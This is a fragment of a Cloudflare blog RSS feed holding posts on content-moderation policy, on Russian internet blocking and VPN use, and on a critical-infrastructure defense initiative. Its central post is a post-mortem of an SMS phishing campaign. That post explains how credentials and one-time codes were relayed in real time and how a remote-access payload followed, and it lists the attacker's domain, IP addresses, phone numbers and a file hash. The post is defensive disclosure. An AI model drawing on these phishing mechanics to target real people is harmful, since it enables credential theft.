particular legal order that required the content be restricted. This transparency is necessary for people to participate in the legal and legislative process. We find it deeply troubling when ISPs comply with court orders by invisibly blackholing content — not giving those who try to access it any idea of what legal regime prohibits it. Speech can be curtailed by law, but proper application of the Rule of Law requires whoever curtails it to be transparent about why they have.</p>
    <div>
      <h3>Core Internet technology services</h3>
      <a href="#core-internet-technology-services">
        
      </a>
    </div>
    <p>While we will generally follow legal orders to restrict security and conduit services, we have a higher bar for core Internet technology services like Authoritative DNS, Recursive DNS/1.1.1.1, and WARP. The challenge with these services is that restrictions on them are global in nature. You cannot easily restrict them just in one jurisdiction so the most restrictive law ends up applying globally.</p><p>We have generally challenged or appealed legal orders that attempt to restrict access to these core Internet technology services, even when a ruling only applies to our free customers. In doing so, we attempt to suggest to regulators or courts more tailored ways to restrict the content they may be concerned about.</p><p>Unfortunately, these cases are becoming more common where largely copyright holders are attempting to get a ruling in one jurisdiction and have it apply worldwide to terminate core Internet technology services and effectively wipe content offline. Again, we believe this is a dangerous precedent to set, placing the control of what content is allowed online in the hands of whatever jurisdiction is willing to be the most restrictive.</p><p>So far, we’ve largely been successful in making arguments that this is not the right way to regulate the Internet and getting these cases overturned. Holding this line we believe is fundamental for the healthy operation of the global Internet. But each showing of discretion across our security or core Internet technology services weakens our argument in these important cases.</p>
    <div>
      <h3>Paying versus free</h3>
      <a href="#paying-versus-free">
        
      </a>
    </div>
    <p>Cloudflare provides both free and paid services across all the categories above. Again, the majority of our customers use our free services and pay us nothing.</p><p>Although most of the concerns we see in our abuse process relate to our free customers, we do not have different moderation policies based on whether a customer is free versus paid. We do, however, believe that in cases where our values are diametrically opposed to a paying customer that we should take further steps to not only not profit from the customer, but to use any proceeds to further our companies’ values and oppose theirs.</p><p>For instance, when a site that opposed LGBTQ+ rights signed up for a paid version of DDoS mitigation service we worked with our Proudflare employee resource group to identify an organization that supported LGBTQ+ rights and donate 100 percent of the fees for our services to them. We don't and won't talk about these efforts publicly because we don't do them for marketing purposes; we do them because they are aligned with what we believe is morally correct.</p>
    <div>
      <h3>Rule of Law</h3>
      <a href="#rule-of-law">
        
      </a>
    </div>
    <p>While we believe we have an obligation to restrict the content that we host ourselves, we do not believe we have the political legitimacy to determine generally what is and is not online by restricting security or core Internet services. If that content is harmful, the right place to restrict it is legislatively.</p><p>We also believe that an Internet where cyberattacks are used to silence what's online is a broken Internet, no matter how much we may have empathy for the ends. As such, we will look to legal process, not popular opinion, to guide our decisions about when to terminate our security services or our core Internet technology services.</p><p>In spite what some may claim, we are not free speech absolutists. We do, however, believe in the Rule of Law. Different countries and jurisdictions around the world will determine what content is and is not allowed based on their own norms and laws. In assessing our obligations, we look to whether those laws are limited to the jurisdiction and consistent with our obligations to respect human rights under the <a href="https://www.ohchr.org/sites/default/files/documents/publications/guidingprinciplesbusinesshr_en.pdf">United Nations Guiding Principles on Business and Human Rights</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3xMuKqx9FMSlG0dQaQB7tY/28a0b309ad48f14256f4200dd852794a/pasted-image-0--3--2.png" />
            
            </figure><p>There remain many injustices in the world, and unfortunately much content online that we find reprehensible. We can solve some of these injustices, but we cannot solve them all. But, in the process of working to improve the security and functioning of the Internet, we need to make sure we don’t cause it long-term harm.</p><p>We will continue to have conversations about these challenges, and how best to approach securing the global Internet from cyberattack. We will also continue to cooperate with legitimate law enforcement to help investigate crimes, to <a href="https://www.cloudflare.com/galileo/">donate funds and services</a> to support equality, human rights, and other causes we believe in, and to participate in policy making around the world to help preserve the free and open Internet.</p> ]]></content:encoded>
            <category><![CDATA[Abuse]]></category>
            <category><![CDATA[Freedom of Speech]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">1dO5CZvpkSasLMSaW3LabY</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Alissa Starzak</dc:creator>
        </item>
        <item>
            <title><![CDATA[The mechanics of a sophisticated phishing scam and how we stopped it]]></title>
            <link>https://blog.cloudflare.com/2022-07-sms-phishing-attacks/</link>
            <pubDate>Tue, 09 Aug 2022 15:56:30 GMT</pubDate>
            <description><![CDATA[ Yesterday, August 8, 2022, Twilio shared that they’d been compromised by a targeted phishing attack. Around the same time as Twilio was attacked, we saw an attack with very similar characteristics also targeting Cloudflare’s employees ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Yesterday, August 8, 2022, Twilio shared that they’d been <a href="https://www.twilio.com/blog/august-2022-social-engineering-attack">compromised by a targeted phishing attack</a>. Around the same time as Twilio was attacked, we saw an attack with very similar characteristics also targeting Cloudflare’s employees. While individual employees did fall for the phishing messages, we were able to thwart the attack through our own use of <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One products</a>, and physical security keys issued to every employee that are required to access all our applications.</p><p>We have confirmed that no Cloudflare systems were compromised. Our <a href="/introducing-cloudforce-one-threat-operations-and-threat-research/">Cloudforce One threat intelligence team</a> was able to perform additional analysis to further dissect the mechanism of the attack and gather critical evidence to assist in tracking down the attacker.</p><p>This was a sophisticated attack targeting employees and systems in such a way that we believe most organizations would be likely to be breached. Given that the attacker is targeting multiple organizations, we wanted to share here a rundown of exactly what we saw in order to help other companies recognize and mitigate this attack.</p>
    <div>
      <h2>Targeted Text Messages</h2>
      <a href="#targeted-text-messages">
        
      </a>
    </div>
    <p>On July 20, 2022, the Cloudflare Security team received reports of employees receiving legitimate-looking text messages pointing to what appeared to be a Cloudflare Okta login page. The messages began at 2022-07-20 22:50 UTC. Over the course of less than 1 minute, at least 76 employees received text messages on their personal and work phones. Some messages were also sent to the employees family members. We have not yet been able to determine how the attacker assembled the list of employees phone numbers but have reviewed access logs to our employee directory services and have found no sign of compromise.</p><p>Cloudflare runs a 24x7 Security Incident Response Team (SIRT). Every Cloudflare employee is trained to report anything that is suspicious to the SIRT. More than 90 percent of the reports to SIRT turn out to not be threats. Employees are encouraged to report anything and never discouraged from over-reporting. In this case, however, the reports to SIRT were a real threat.</p><p>The text messages received by employees looked like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2NzSGBSGfCogIk4BXWmXND/cb4bc7d2f174f8b360b7c51664e71f66/image3-5.png" />
            
            </figure><p>They came from four phone numbers associated with T-Mobile-issued SIM cards: (754) 268-9387, (205) 946-7573, (754) 364-6683 and (561) 524-5989. They pointed to an official-looking domain: cloudflare-okta.com. That domain had been registered via Porkbun, a <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name-registrar/">domain registrar</a>, at 2022-07-20 22:13:04 UTC — less than 40 minutes before the phishing campaign began.</p><p>Cloudflare built our <a href="https://www.cloudflare.com/products/registrar/custom-domain-protection/">secure registrar product</a> in part to be able to monitor when domains using the Cloudflare brand were registered and get them shut down. However, because this domain was registered so recently, it had not yet been published as a new .com registration, so our systems did not detect its registration and our team had not yet moved to terminate it.</p><p>If you clicked on the link it took you to a phishing page. The phishing page was hosted on DigitalOcean and looked like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/32GWziRZv7ijycvETvNHny/58f811265c86872398b876d64f65a55d/image1-13.png" />
            
            </figure><p>Cloudflare uses Okta as our identity provider. The phishing page was designed to look identical to a legitimate Okta login page. The phishing page prompted anyone who visited it for their username and password.</p>
    <div>
      <h2>Real-Time Phishing</h2>
      <a href="#real-time-phishing">
        
      </a>
    </div>
    <p>We were able to analyze the payload of the <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing attack</a> based on what our employees received as well as its content being posted to services like VirusTotal by other companies that had been attacked. When the phishing page was completed by a victim, the credentials were immediately relayed to the attacker via the messaging service Telegram. This real-time relay was important because the phishing page would also prompt for a Time-based One Time Password (TOTP) code.</p><p>Presumably, the attacker would receive the credentials in real-time, enter them in a victim company’s actual login page, and, for many organizations that would generate a code sent to the employee via SMS or displayed on a password generator. The employee would then enter the TOTP code on the phishing site, and it too would be relayed to the attacker. The attacker could then, before the TOTP code expired, use it to access the company’s actual login page — defeating most two-factor authentication implementations.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6kHLCU7dpKptSuJXwOy39X/0da593615149665ba8f7360e4232a996/image2-6.png" />
            
            </figure>
    <div>
      <h2>Protected Even If Not Perfect</h2>
      <a href="#protected-even-if-not-perfect">
        
      </a>
    </div>
    <p>We confirmed that three Cloudflare employees fell for the phishing message and entered their credentials. However, Cloudflare does not use TOTP codes. Instead, every employee at the company is issued a FIDO2-compliant security key from a vendor like YubiKey. Since the hard keys are tied to users and implement <a href="https://www.yubico.com/blog/creating-unphishable-security-key/">origin binding</a>, even a sophisticated, real-time phishing operation like this cannot gather the information necessary to log in to any of our systems. While the attacker attempted to log in to our systems with the compromised username and password credentials, they could not get past the hard key requirement.</p><p>But this phishing page was not simply after credentials and TOTP codes. If someone made it past those steps, the phishing page then initiated the download of a phishing payload which included AnyDesk’s remote access software. That software, if installed, would allow an attacker to control the victim’s machine remotely. We confirmed that none of our team members got to this step. If they had, however, our endpoint security would have stopped the installation of the remote access software.</p>
    <div>
      <h2>How Did We Respond?</h2>
      <a href="#how-did-we-respond">
        
      </a>
    </div>
    <p>The main response actions we took for this incident were:</p>
    <div>
      <h3>1. Block the phishing domain using Cloudflare Gateway</h3>
      <a href="#1-block-the-phishing-domain-using-cloudflare-gateway">
        
      </a>
    </div>
    <p>Cloudflare Gateway is a <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">Secure Web Gateway</a> solution providing threat and data protection with DNS / HTTP filtering and natively-integrated <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a>. We use this  solution internally to proactively identify malicious domains and block them. Our team added the malicious domain to Cloudflare Gateway to block all employees from accessing it.</p><p>Gateway’s automatic detection of malicious domains also identified the domain and blocked it, but the fact that it was registered and messages were sent within such a short interval of time meant that the system hadn’t automatically taken action before some employees had clicked on the links. Given this incident we are working to speed up how quickly malicious domains are identified and blocked. We’re also implementing controls on access to newly registered domains which we offer to customers but had not implemented ourselves.</p>
    <div>
      <h3>2. Identify all impacted Cloudflare employees and reset compromised credentials</h3>
      <a href="#2-identify-all-impacted-cloudflare-employees-and-reset-compromised-credentials">
        
      </a>
    </div>
    <p>We were able to compare recipients of the phishing texts to login activity and identify threat-actor attempts to authenticate to our employee accounts. We identified login attempts blocked due to the hard key (U2F) requirements indicating that the correct password was used, but the second factor could not be verified. For the three of our employees' credentials were leaked, we reset their credentials and any active sessions and initiated scans of their devices.</p>
    <div>
      <h3>3. Identify and take down threat-actor infrastructure</h3>
      <a href="#3-identify-and-take-down-threat-actor-infrastructure">
        
      </a>
    </div>
    <p>The threat actor's phishing domain was newly registered via Porkbun, and hosted on DigitalOcean. The phishing domain used to target Cloudflare was set up less than an hour before the initial phishing wave. The site had a Nuxt.js frontend, and a Django backend. We worked with DigitalOcean to shut down the attacker’s server. We also worked with Porkbun to seize control of the malicious domain.</p><p>From the failed sign-in attempts we were able to determine that the threat actor was leveraging Mullvad VPN software and distinctively using the Google Chrome browser on a Windows 10 machine. The VPN IP addresses used by the attacker were 198.54.132.88, and 198.54.135.222. Those IPs are assigned to Tzulo, a US-based dedicated server provider whose website claims they have servers located in Los Angeles and Chicago. It appears, actually, that the first was actually running on a server in the Toronto area and the latter on a server in the Washington, DC area. We blocked these IPs from accessing any of our services.</p>
    <div>
      <h3>4. Update detections to identify any subsequent attack attempts</h3>
      <a href="#4-update-detections-to-identify-any-subsequent-attack-attempts">
        
      </a>
    </div>
    <p>With what we were able to uncover about this attack, we incorporated additional signals to our already existing detections to specifically identify this threat-actor. At the time of writing we have not observed any additional waves targeting our employees. However, intelligence from the server indicated the attacker was targeting other organizations, including Twilio. We reached out to these other organizations and shared intelligence on the attack.</p>
    <div>
      <h3>5. Audit service access logs for any additional indications of attack</h3>
      <a href="#5-audit-service-access-logs-for-any-additional-indications-of-attack">
        
      </a>
    </div>
    <p>Following the attack, we screened all our system logs for any additional fingerprints from this particular attacker. Given Cloudflare Access serves as the central control point for all Cloudflare applications, we can search the logs for any indication the attacker may have breached any systems. Given employees’ phones were targeted, we also carefully reviewed the logs of our employee directory providers. We did not find any evidence of compromise.</p>
    <div>
      <h2>Lessons Learned and Additional Steps We’re Taking</h2>
      <a href="#lessons-learned-and-additional-steps-were-taking">
        
      </a>
    </div>
    <p>We learn from every attack. Even though the attacker was not successful, we are making additional adjustments from what we’ve learned. We’re adjusting the settings for Cloudflare Gateway to restrict or sandbox access to sites running on domains that were registered within the last 24 hours. We will also run any non-allow listed sites containing terms such as “cloudflare” “okta” “sso” and “2fa” through our <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">browser isolation technology</a>. We are also increasingly using <a href="https://www.cloudflare.com/products/zero-trust/email-security/">Cloudflare Area 1’s phish-identification technology</a> to scan the web and look for any pages that are designed to target Cloudflare. Finally, we’re tightening up our Access implementation to prevent any logins from unknown VPNs, residential proxies, and infrastructure providers. All of these are standard features of the same products we offer to customers.</p><p>The attack also reinforced the importance of three things we’re doing well. First, requiring hard keys for access to all applications. <a href="https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/">Like Google</a>, we have not seen any successful phishing attacks since rolling hard keys out. Tools like Cloudflare Access made it easy to support hard keys even across legacy applications. If you’re an organization interested in how we rolled out hard keys, reach out to <a>cloudforceone-irhelp@cloudflare.com</a> and our security team would be happy to share the best practices we learned through this process.</p><p>Second, using Cloudflare’s own technology to protect our employees and systems. Cloudflare One’s solutions like Access and Gateway were critical to staying ahead of this attack. We configured our Access implementation to require hard keys for every application. It also creates a central logging location for all application authentications. And, if ever necessary, a place from which we can kill the sessions of a potentially compromised employee. Gateway allows us the ability to shut down malicious sites like this one quickly and understand what employees may have fallen for the attack. These are all functionalities that we make available to Cloudflare customers as part of our Cloudflare One suite and this attack demonstrates how effective they can be.</p><p>Third, having a paranoid but blame-free culture is critical for security. The three employees who fell for the phishing scam were not reprimanded. We’re all human and we make mistakes. It’s critically important that when we do, we report them and don’t cover them up. This incident provided another example of why security is part of every team member at Cloudflare’s job.</p>
    <div>
      <h2>Detailed Timeline of Events</h2>
      <a href="#detailed-timeline-of-events">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>2022-07-20 22:49 UTC</p><p>Attacker sends out 100+ SMS messages to Cloudflare employees and their families.</p><p>2022-07-20 22:50 UTC</p><p>Employees begin reporting SMS messages to Cloudflare Security team.</p><p>2022-07-20 22:52 UTC</p><p>Verify that the attacker's domain is blocked in Cloudflare Gateway for corporate devices.</p><p>2022-07-20 22:58 UTC</p><p>Warning communication sent to all employees across chat and email.</p><p>2022-07-20 22:50 UTC to2022-07-20 23:26 UTC</p><p>Monitor telemetry in the Okta System log &amp; Cloudflare Gateway HTTP logs to locate credential compromise. Clear login sessions and suspend accounts on discovery.</p><p>2022-07-20 23:26 UTC</p><p>Phishing site is taken down by the hosting provider.</p><p>2022-07-20 23:37 UTC</p><p>Reset leaked employee credentials.</p><p>2022-07-21 00:15 UTC</p><p>Deep dive into attacker infrastructure and capabilities.</p>
    <div>
      <h2>Indicators of compromise</h2>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    
<table>
<thead>
  <tr>
    <th>Value</th>
    <th>Type</th>
    <th>Context and MITRE Mapping</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td>cloudflare-okta[.]com hosted on 147[.]182[.]132[.]52</td>
    <td>Phishing URL</td>
    <td><a href="https://attack.mitre.org/techniques/T1566/002/">T1566.002</a>: Phishing: Spear Phishing Link sent to users.</td>
  </tr>
  <tr>
    <td>64547b7a4a9de8af79ff0eefadde2aed10c17f9d8f9a2465c0110c848d85317a</td>
    <td>SHA-256</td>
    <td><a href="https://attack.mitre.org/techniques/T1219/">T1219</a>: Remote Access Software being distributed by the threat actor</td>
  </tr>
</tbody>
</table>
    <div>
      <h2>What You Can Do</h2>
      <a href="#what-you-can-do">
        
      </a>
    </div>
    <p>If you are seeing similar attacks in your environment, please don’t hesitate to reach out to <a>cloudforceone-irhelp@cloudflare.com</a>, and we’re happy to share best practices on how to keep your business secure. If on the other hand, you are interested in learning more about how we implemented security keys please review our <a href="/how-cloudflare-implemented-fido2-and-zero-trust/">blog post</a> or reach out to <a>securitykeys@cloudflare.com</a>.</p><p>Finally, do you want to work on detecting and mitigating the next attacks with us? We’re hiring on our Detection and Response team, <a href="https://boards.greenhouse.io/cloudflare/jobs/4364485?gh_jid=4364485">come join us</a>!</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Cloudflare Gateway]]></category>
            <category><![CDATA[Cloudflare Access]]></category>
            <guid isPermaLink="false">4NqFdSmdzCcdoVLRQ05xzx</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Daniel Stinson-Diess</dc:creator>
            <dc:creator>Sourov Zaman</dc:creator>
        </item>
        <item>
            <title><![CDATA[What Cloudflare is doing to keep the Open Internet flowing into Russia and keep attacks from getting out]]></title>
            <link>https://blog.cloudflare.com/what-cloudflare-is-doing-to-keep-the-open-internet-flowing-into-russia-and-keep-attacks-from-getting-out/</link>
            <pubDate>Sun, 03 Apr 2022 01:28:36 GMT</pubDate>
            <description><![CDATA[ Following Russia’s unjustified and tragic invasion of Ukraine in late February, the world has watched closely as Russian troops attempted to advance across Ukraine, only to be resisted and repelled by the Ukrainian people ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Following Russia’s unjustified and tragic invasion of Ukraine in late February, the world has watched closely as Russian troops attempted to advance across Ukraine, only to be resisted and repelled by the Ukrainian people. Similarly, we’ve seen a <a href="/internet-traffic-patterns-in-ukraine-since-february-21-2022/">significant amount</a> of cyber attack activity in the region. We continue to work to protect an increasing number of Ukrainian government, media, financial, and nonprofit websites, and we <a href="https://www.heise.de/hintergrund/Running-the-ua-top-level-domain-in-times-of-war-6611777.html">protected the Ukrainian top level domain</a> (.ua) to help keep Ukraine’s presence on the Internet operational.</p><p>At the same time, we’ve closely watched significant and unprecedented activity on the Internet in Russia. The Russian government has taken steps to tighten its control over both the technical components and the content of the Russian Internet. For their part, the people in Russia are doing something very different. They have been adopting tools to maintain access to the global Internet, and they have been seeking out non-Russian media sources. This blog post outlines what we’ve observed.</p>
    <div>
      <h3>The Russian Government asserts control over the Internet</h3>
      <a href="#the-russian-government-asserts-control-over-the-internet">
        
      </a>
    </div>
    <p>Over the last five years, the Russian government has taken steps to tighten its control of a sovereign Internet within Russia’s borders, including laws requiring Russian ISPs to install equipment allowing the government to monitor and block Internet activity, and requiring the establishment of an exclusively Russian DNS (outside ICANN).  And it created mechanisms for the Russian government to control how Russia was connected to the global Internet, so they could pull the plug if they wanted.</p><p>Since the Russian invasion of Ukraine, the Russian government has made a series of announcements related to implementation of its sovereign Internet laws. Russian government agencies were instructed to switch to Russian DNS servers, move public resources to Russian hosting services, and take a number of other steps designed to reduce reliance on non-Russian providers. Although some took these initiatives as <a href="https://www.vice.com/en/article/88gevb/russia-is-preparing-to-cut-itself-off-from-the-global-internet">an announcement</a> that Russia intended to disconnect from the global Internet, so far Russia does not appear to have leveraged the tools it has to disconnect itself entirely from the global Internet.  We continue to see connections processing successfully in Russia through non-Russia infrastructure.</p><p>In the meantime, authorities in Russia have implemented a series of targeted blocking actions against websites and operators that they find objectionable. Initially, officials targeted popular social media sites like Facebook, Instagram, and Twitter, as well as Russian language outlets based outside the country.</p><p>We can see the effect of some of those blocks on traffic from Russian users to different news websites in Russia and Ukraine before and after blocks were implemented.  </p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/L3AyeQAadXwnRnmF4CQZ4/d0b9b8b79c6529384e73f5dc570f96bc/image9-1.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OZmnMZGwqHUwitHYv0IcJ/f880e8c9a4060c1acbf57d4a65cb2f8d/image3-2.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4MnPUvJDQq4a21Gk7GnN9X/fedc0bb29d75c0e62d7b2c59498ace80/image1-3.png" />
            
            </figure><p>In each case, these news sites saw exponential growth in their traffic in the days around the February 24th invasion of Ukraine.  But that increase was met within a matter of days by actions to block traffic to those sites. The blocks had varying degrees of success over the first few weeks, though each of them seem to have been eventually successful in denying access to those sources of news through traditional Internet channels.  </p><p>But that is only half the story.  As the Russian government took steps to control traditional channels for Internet access, there were shifts in the ways many Russians used the Internet.</p>
    <div>
      <h3>Russian citizens turning to tools to gain access to the open Internet</h3>
      <a href="#russian-citizens-turning-to-tools-to-gain-access-to-the-open-internet">
        
      </a>
    </div>
    <p>Russians have been adopting applications and tools that allow them to engage with the Internet privately and avoid some of the mechanisms that the Russian government is using to control and monitor access to the Internet. Whereas the most popular applications in the Apple App Store in most of the world in March continue to relate to social media and games, the leaderboard in Russia looked very different:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6PPLqjcchFGDvhzj8hsNt0/987c5ce751f0c23e8d79f044b8fd4541/image2-2.png" />
            
            </figure><p>All of the top apps in Russia in March were for private and secure Internet access or encrypted messaging apps, including the most downloaded app – Cloudflare’s own WARP / 1.1.1.1 (a privacy-based recursive DNS resolver). This list of popular apps is a stunning contrast with every other country in the world.</p><p>Because of the significant and important popularity of WARP (1.1.1.1), we’ve had some detailed insight into exactly how this has played out. If we look back to the beginning of February we see that Cloudflare’s WARP tool was little used in Russia. Its use took off from the first weekend of the war, and peaked two weeks ago. Later, after this virtual migration to such secure tools became apparent, we saw attempts to block access to the tools used to access the Internet securely.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4t9Sfa6JkRCIQqzf1LLmLa/fd6bc76f7f500cdf6e898902441a71c3/image10.png" />
            
            </figure><p>While levels have receded from their peak, a large number of Russians continue to use Cloudflare WARP in Russia at massively higher levels than pre-war.</p><p>In addition to the ways Russians are using the Internet increasingly relying on private and encrypted communications, we’ve also seen a shift in what they are trying to access. Here’s a chart of DNS requests from Russian users for a well known US newspaper. Recent DNS traffic for the site has quintupled compared to pre-war levels, indicating Russians are trying to access that news source.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2YTT5mE3ZZAsRhZ7OtTgeg/6148dcedb9620c4e1306ce4752f9cef2/image8.png" />
            
            </figure><p>And here’s DNS traffic for a large French news source. Again, DNS lookups have grown enormously as Russians try to access it.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4tf5We66VeiiZZfK2WP8wR/62df69d607cb8841d2ea1a5b0a1cd167/image5-1.png" />
            
            </figure><p>And here’s a British newspaper.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/22M1VPQEkIBbexTn0aUvGK/eae1604898841956d4781078ee9b199f/image4-1.png" />
            
            </figure><p>The picture is clear from these three charts. Russians want access to non-Russian news sources and based on the popularity of private Internet access tools and VPNs, they are willing to work to get it.</p>
    <div>
      <h3>A front line against cyberattack</h3>
      <a href="#a-front-line-against-cyberattack">
        
      </a>
    </div>
    <p>In addition to the services we’ve been able to provide average citizens in Russia, our servers at the edge of the Internet in-country have also permitted us to detect and block attacks originating there. When attacks are mitigated inside Russia, they never travel outside Russian borders. That’s always been part of the proposition of Cloudflare’s distributed network – to identify and block cyber attacks (especially DDoS attacks) locally, and before they can ever get off the ground.</p><p>Here’s what DDoS activity originating inside Russia and blocked there by Cloudflare has looked like since the beginning of February. Normal DDoS activity originating from Russian networks and blocked by Cloudflare’s servers there is relatively low throughout February but then grows massively in the middle of March.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Vlvd4C3ZfwroCzqAc6MIp/f7844f24b507e0e49c7ff2f3357f8690/image7.png" />
            
            </figure><p>To be clear, being able to identify where cyber attack traffic originates is not the same as being able to attribute where the attacker is located. Attributing cyber attacks is difficult, and now is a time to be particularly careful with attribution. It is relatively common for cyber attackers to launch attacks from remote locations around the world. This often happens when they are able to hijack devices in other countries through things like IoT (Internet of Things) corruptions.</p><p>But even with such subterfuge, we’ve still seen a significant increase in the number of blocked attacks that are hitting our servers inside Russia.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2RqUtXpSJgEraVpwUN73Y7/d2db3f821adceb2553f335e0a1c9b36e/image6-1.png" />
            
            </figure><p>A few weeks ago, as the invasion of Ukraine was in its early stages, I noted that “<a href="/steps-taken-around-cloudflares-services-in-ukraine-belarus-and-russia/">Russia needs more Internet, not less</a>.” At a time of unprecedented economic sanctions by the United States and Europe, there have been calls for all foreign companies to go further and exit Russia completely, including calls for Internet providers to disconnect Russia. To be clear, Cloudflare has minimal sales and commercial activity in Russia – we’ve never had a corporate entity, an office, or employees there – and we’ve taken steps to ensure that we’re not paying taxes or fees to the Russian government. But given the significant impact of our services on the availability and security of the Internet, we believe removing our services from Russia altogether would do more harm than good.</p><p>While we deeply appreciate the motivation of the calls for companies to exit Russia, this withdrawal by Internet companies can have the unintended effect of advancing and entrenching the interests of the Russian government to control the Internet in Russia. Efforts to have Russia cut off from the global Internet through <a href="https://www.icann.org/en/system/files/correspondence/marby-to-fedorov-02mar22-en.pdf">ICANN</a> and <a href="https://www.ripe.net/publications/news/announcements/ripe-ncc-response-to-request-from-ukrainian-government">RIPE</a> will only cut off the Russian people from information about the war in Ukraine that the Russian government doesn’t want them to access.  After a number of U.S.-based certificate authorities stopped issuing SSL certificates for Russian websites, Russia <a href="https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/">responded</a> in early March by encouraging Russian citizens to download a Russian Root Certificate Authority instead. As observed by <a href="https://www.eff.org/deeplinks/2022/03/you-should-not-trust-russias-new-trusted-root-ca">EFF</a>, “the Russian state’s stopgap measure to keep its services running also enables spying on Russians, now and in the future.”</p><p>This is why there has been near universal agreement by experts that it is imperative the Russian Internet stay as open as possible for the Russian people. Dozens of civil society groups have <a href="https://www.accessnow.org/letter-us-government-internet-access-russia-belarus-ukraine/">urged</a> governments to work to counteract authoritarian actions “and ensure that sanctions and other steps meant to repudiate the Russian government’s illegal actions do not backfire, by reinforcing Putin’s efforts to assert information control.” Russian digital rights activists have <a href="https://roskomsvoboda.org/post/24-february-24-march-2022/">pleaded with</a> service providers to offer Russians free VPN access, so they are not left isolated from global news sources.  Even the U.S. State Department has <a href="https://www.washingtonpost.com/technology/2022/03/16/apple-google-cloudflare-russia/">made clear</a>, “It is critical to maintain the flow of information to the people of Russia to the fullest extent possible.”</p><p>Supporting our mission to help build a better Internet, it’s been a busy six weeks for our team monitoring these developments and working around the clock to make sure Ukrainian web properties are defended and that ordinary Russians can access the global Internet. We remain in awe of the brave Ukrainians standing up in defense of their homeland, and continue to hope that peace will prevail.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/y2JtB5XQIA6nRzvTn7mj7/01e4a697fff09b8211ecc20dd6b40ed7/image1-8.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Ukraine]]></category>
            <category><![CDATA[Russia]]></category>
            <category><![CDATA[Freedom of Speech]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">22RL3iYsnMld5ewbY0p3Vx</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare, CrowdStrike, and Ping Identity launch the Critical Infrastructure Defense Project]]></title>
            <link>https://blog.cloudflare.com/announcing-critical-infrastructure-defense/</link>
            <pubDate>Mon, 07 Mar 2022 13:59:10 GMT</pubDate>
            <description><![CDATA[ Cloudflare has launched the Critical Infrastructure Defense Project to counter potential cyber retaliation for sanctions resulting from Russia's invasion of Ukraine. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4PYAT3vYGJDL8sN4RWqK1u/9513eca4980156be63338a8b13017010/unnamed--1--1.png" />
            
            </figure><p>Today, in partnership with CrowdStrike and Ping Identity, Cloudflare is launching the Critical Infrastructure Defense Project (<a href="https://criticalinfrastructuredefense.org/">CriticalInfrastructureDefense.org</a>). The Project was born out of conversations with cybersecurity and government experts concerned about potential retaliation to the sanctions that resulted from the Russian invasion of Ukraine.</p><p>In particular, there is a fear that critical United States infrastructure will be targeted with cyber attacks. While these attacks may target any industry, the experts we consulted with were particularly concerned about three areas that were often underprepared and could cause significant disruption: hospitals, energy, and water.</p><p>To help address that need, Cloudflare, CrowdStrike, and Ping Identity have committed under the Critical Infrastructure Defense Project to offer a broad suite of our products for free for at least the next four months to any United States-based hospital, or energy or water utility. You can learn more at: <a href="https://www.criticalinfrastructuredefense.org/">www.CriticalInfrastructureDefense.org</a>.</p><p>We are not powerless against hackers. Organizations that have adopted a <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> approach to security have been successful at mitigating even determined attacks. There are three core components to any Zero Trust security approach: 1) <a href="https://www.cloudflare.com/network-security/">Network Security,</a> 2) Endpoint Security; and 3) Identity.</p>
            <figure>
            
